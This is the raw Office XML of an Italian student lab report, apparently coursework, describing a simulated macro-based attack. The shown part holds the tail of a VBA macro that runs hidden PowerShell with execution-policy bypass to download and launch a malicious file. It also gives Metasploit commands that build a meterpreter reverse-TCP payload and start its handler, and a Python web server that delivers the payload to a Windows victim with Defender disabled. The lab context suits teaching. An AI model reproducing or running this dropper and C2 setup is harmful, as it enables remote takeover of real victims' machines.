    <w:p w14:paraId="7B8E35CE" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    comandoDaEseguire = Replace(comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05518EDF" w14:textId="594EAE2E" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    comandoDaEseguire2 = Replace(comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2A787" w14:textId="5D1AC396" w:rsidR="00B046EC" w:rsidRPr="00B355D4" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' Esegu</w:t>
      </w:r>
      <w:r w:rsidR="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> il comando PowerShell per scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1FCEF" w14:textId="3DBA6577" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101136F7" w14:textId="0FAE9E8D" w:rsidR="00B046EC" w:rsidRPr="00B355D4" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ' Esegu</w:t>
      </w:r>
      <w:r w:rsidR="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> il comando PowerShell per eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA3A1E9" w14:textId="63A35BCE" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C875DCF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>' Rilascio l'oggetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DEBDC6" w14:textId="03438D76" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F44E7" w14:textId="7623398E" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46155E57" w14:textId="26A5DBC5" w:rsidR="00B355D4" w:rsidRDefault="00B355D4" w:rsidP="00B355D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CODICE MACRO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D677C39" w14:textId="77777777" w:rsidR="00B355D4" w:rsidRPr="00B046EC" w:rsidRDefault="00B355D4" w:rsidP="00B046EC"/>
    <w:p w14:paraId="7A3DAA53" w14:textId="76E2AEC1" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:t>INFRASTRUTTURA ATTACCO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC2A6C" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="2329B906" w14:textId="485F51C7" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:r>
        <w:t>In questa sezione dovete presentare le macchine virtuali utilizzate per condurre l’attacco e come sono state configurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4770B8" w14:textId="73CF8303" w:rsidR="00B355D4" w:rsidRDefault="00B355D4" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ATTACCANTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D444A79" w14:textId="260A00C5" w:rsidR="00B355D4" w:rsidRDefault="00B355D4" w:rsidP="003D71C6">
      <w:r w:rsidRPr="00B355D4">
        <w:t xml:space="preserve">L’attaccante </w:t>
      </w:r>
      <w:r>
        <w:t>è la macchina Kali Linux usata a lezione</w:t>
      </w:r>
      <w:r w:rsidR="00196577">
        <w:t xml:space="preserve"> con un ip statico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il software utilizzato per creare il server C2 è Metasploit, è stato utilizzato il metodo visto a lezione, di seguito riporto </w:t>
      </w:r>
      <w:r w:rsidR="00BA0797">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comandi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77275668" w14:textId="74CA2EC2" w:rsidR="00B355D4" w:rsidRDefault="00B355D4" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>//creo il software malevolo</w:t>
      </w:r>
      <w:r w:rsidR="0081456B" w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> da scaricare nella macchina della vittima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC1B022" w14:textId="410CF17E" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST</w:t>
      </w:r>
      <w:r w:rsidR="00196577">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>ipAttaccante LPORT</w:t>
      </w:r>
      <w:r w:rsidR="00196577">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>porta -f exe &gt; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE23DA0" w14:textId="3E3C5F6A" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>metto in ascolto il server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26D5BC" w14:textId="79EECEAA" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7DB91D" w14:textId="23C055F0" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4DE25" w14:textId="35F60C04" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="0080432E">
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>HOST ipAttaccante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F35806" w14:textId="2E9CDCD3" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t xml:space="preserve">set LPORT </w:t>
      </w:r>
      <w:r w:rsidR="00196577">
        <w:t>porta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308BF2A" w14:textId="251A6859" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA55F68" w14:textId="62E62FAE" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>// metto in ascolto un altro server per permettere di scaricare il payload malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368B0F9" w14:textId="213281B1" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t>python -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2ECAC" w14:textId="63E62EC9" w:rsidR="00B160DA" w:rsidRDefault="00B160DA" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B160DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VITTIMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FA8A2" w14:textId="66079277" w:rsidR="00B160DA" w:rsidRPr="00B160DA" w:rsidRDefault="00B160DA" w:rsidP="0081456B">
      <w:r w:rsidRPr="00B160DA">
        <w:t>La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vittima è una macchina Windows con Windows Defender disabilitato e con pacchetto Office installato</w:t>
      </w:r>
      <w:r w:rsidR="00BA0797">
        <w:t xml:space="preserve"> (per permettere l’apertura del document Word malevolo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FBD26" w14:textId="77777777" w:rsidR="0081456B" w:rsidRPr="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0081456B" w:rsidRPr="008145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1C6"/>
    <w:rsid w:val="00196577"/>
    <w:rsid w:val="002214D0"/>
    <w:rsid w:val="003104B9"/>
    <w:rsid w:val="003833E3"/>
    <w:rsid w:val="003D71C6"/>
    <w:rsid w:val="0080432E"/>
    <w:rsid w:val="0081456B"/>
    <w:rsid w:val="00B046EC"/>
    <w:rsid w:val="00B160DA"/>
    <w:rsid w:val="00B355D4"/>
    <w:rsid w:val="00BA0797"/>
    <w:rsid w:val="00DD1CDD"/>
    <w:rsid w:val="00DE7216"/>
    <w:rsid w:val="00EF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7976B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{73C8B3BE-5C38-468F-9C6D-95D333F5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71C6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003D71C6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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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D71C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3D71C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3D71C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D71C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D71C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3D71C6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003D71C6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003D71C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D71C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D71C6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D71C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D71C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3D71C6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3D71C6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3D71C6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3D71C6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3D71C6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D71C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df6df5-3fad-46ca-9360-c9ec0c0b036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AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
    <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
    <xsd:import namespace="f1c65361-0737-4e30-bb3a-9e2ed6feaf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f6df5-3fad-46ca-9360-c9ec0c0b0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65361-0737-4e30-bb3a-9e2ed6fea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D7A4B1-5AA0-4687-ADA6-A38D425A5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3BB391-AD20-4994-9E9B-D3F6C61061F0}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD57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4C8422-D422-4F67-B8D4-238A7F717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f6df5-3fad-46ca-9360-c9ec0c0b036b"/>
    <ds:schemaRef ds:uri="f1c65361-0737-4e30-bb3a-9e2ed6fea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aria Francesca Paci</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>CHRISTIAN FARINA</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T13:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-27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83bd9d-ad50-4f0b-b8f1-da2489c79626</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x01010003AD22B01210FE489D9BE433888FACA9</vt:lpwstr>
  </property>
</Properties>
</file>